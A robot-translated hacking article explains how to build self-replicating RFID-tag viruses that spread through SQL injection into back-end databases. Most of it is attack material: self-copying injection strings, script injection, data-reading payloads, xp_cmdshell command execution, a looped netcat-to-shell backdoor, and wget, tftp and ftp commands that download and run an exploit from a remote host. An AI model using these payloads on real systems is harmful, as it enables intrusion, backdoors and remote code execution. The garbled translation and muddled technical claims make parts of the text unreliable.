This page has been robot translated, sorry for typos if any. Original content here.

Virus in RFID hacking, structure.


This article is an addition on RFID hacking. The basics and the beginning are set out in the first article at: From which we learned that, RFID is a Radio Frequency IDentification (radio frequency identification) method of remote storage and retrieval of information by transmitting radio signals using devices called RFID tags.

{About parasites}

The main functions of the virus in this type of attack are self-copying, and the execution of arbitrary code. For these purposes, the parasite usually uses a database. Details depend on the database that is used. Basically, there are two classes of viruses in this type of attack: the first uses arbitrary requests in the database, the second implements everything with the help of quines (special program).
Arbitrary code that a virus can execute depends on the database's response mechanisms to SQL injections.

{SQL injection}

In administration systems, the method of querying RFID tags from a database is usually used, followed by the return of data, which in turn can be copied with the correct sequence. So copy themselves tags in the presence of certain factors.

At the moment, you can consider two types of viruses, the first is a program of a single request and the second is the use of multiple requests.
The first type of virus uses a minimum of space, and in its structure can not bear the combat load. And it is used only to enter already planned information into the database. A virus that uses multiple requests, on the contrary, has already been created to infect auto-identification systems and enter malicious code or other combat load. Most often, the second method is used, but for correct operation of this type of virus, it is required that certain conditions in the database are properly met, and this is the provision of the GetCurrentQuery-style function for access. This should be avoided in order to avoid an error, since this API fitsch allows you to enter a comment. (I hasten to reassure you, these functions are initially included in the default systems)

Specific attacks can be carried out when the database has made a request in the label, and she responded with this content
UPDATE ContainerContents SET OldContents = '% contents%' WHERE TagID = '% id%'

Here the contents and id variables will be buried in the following

If this request passes without errors, then the attacker can change the request at his own discretion with the help of our favorite quote (''). And what can you do ??? And this is to add just a self-copying area to the NewContents area and infect other systems in the same way.

Here is approximately what we need:
Apples', NewContents=SUBSTR(GetCurrentQuery (),43,57) – UPDATE ContainerContents SET OldContents='Apples', NewContents=SUBSTR(GetCurrentQuery (),43,57) -- WHERE TagId='123'
Instead of just updating the OldContents pane, the query now also updates the NewContents pane. With the SQL (-) comment, all rows in the database will be moved. This opens up new opportunities for the attacker.

Insert malicious code.

In the technology of injects described above, it is impossible to execute any code except for requests to the database. However, when turned on from the client side of the scripteng, the server automatically becomes vulnerable. Scripts can be inserted after the comment, so that the database system ignores them.
The only thing you need to consider is that when you turn on the code in the exploit, you need to consider the third parameter SUBSTR, which must correspond to the length of the exploit.
Apples', NewContents=SUBSTR(GetCurrentQuery (),43,73) --<script>...</script>
In a more serious version with the use of variables, and inserts not only of some specific squeaks, it will look like this:
Apples'; UPDATE ContainerContents SET NewContents=NewContents || ''';' || GetCurrentQuery () || ';%payload%; --';%payload% --
Here the malicious code must be worked out twice, Ie the first time, this is self-copying to the database, the second time is the execution of itself.

Currently, the ability to comment is present in Oracle (OCI / iSQL * Plus). It provides GetCurrentQuery-style functionality, with subsequent administrator privileges. PostgreSQL, MySQL, and SQL Server also allow comments and multiple injection requests. There is also GetCurrentQuery-style functionality. However, for PostgreSQL and SQL Server, reliable working viruses have not yet been created, everything was limited to trial development.

{A few examples of the malicious code entered}

System management functions provided by databases can be used to cause problems. For example, Microsoft SQL Server provides a CLOSURE function that allows a database to be closed from SQL.
Reading Database Data
UPDATE ContainerContents SET OldContents='%contents%' WHERE TagID='%id%' data in the query below can be used to directly query the database.
'|| (SELECT ...) ||'
In this case, quotes perform SQL injection and force the data to be interpreted as code. || the operator performs a sequence connection, causing the result of the FAVORITE query to be added to the area in the database. The operator of communication sequence is required in order to nitrolize the comment ie our favorite quotes.

{Execution of Shell commands via SQL injection}

SQL Server provides the xp_cmdshell procedure that allows malicious and not-so, commands to be executed.
EXEC Master..xp_cmdshell 'commands';

{Installing backdoors in the system}

To run through the system we need the following commands.
netcat -lp1234|sh
where 1234 port will be tapped.

But here we face the danger of the installed and properly configured firewall or brendmaura. And there is a solution, to run the code in an infinite loop, so that it works like a demon, which in itself allows you to create a more advanced backing.
screen -dmS t bash -c"while [ true ]; do netcat -lp1234|sh; done {Other Features}

There are also useful features, such as wget. Ie, downloading a file over the network, and storing the file in the system.
wget http://ip/myexploit -O /tmp/myexploit; chmod +x /tmp/myexploit; /tmp/myexploit
wget is usually not available on Windows systems. In this case, you need to use tftp.
tftp -i ip GET myexploit.exe & myexploit
You can also create a text file, as they say on the fly, using the echo function
echo anonymous & echo BIN & echo GET myexploit.exe & echo quit) > ftp.txt & ftp -s:ftp.txt ip & myexploit {Conclusion}

This article described the penetration into the vulnerable system by programming RFID tags. Here, of course, I have to warn you that all the material presented is presented for reference only. In view of the complexity of the execution of the technology, namely the creation of the label itself and programming it with malicious intent, it seems to me too difficult for a simple man in the street. So I warn people who know but who suffer from idleness, you should not check this information in practice.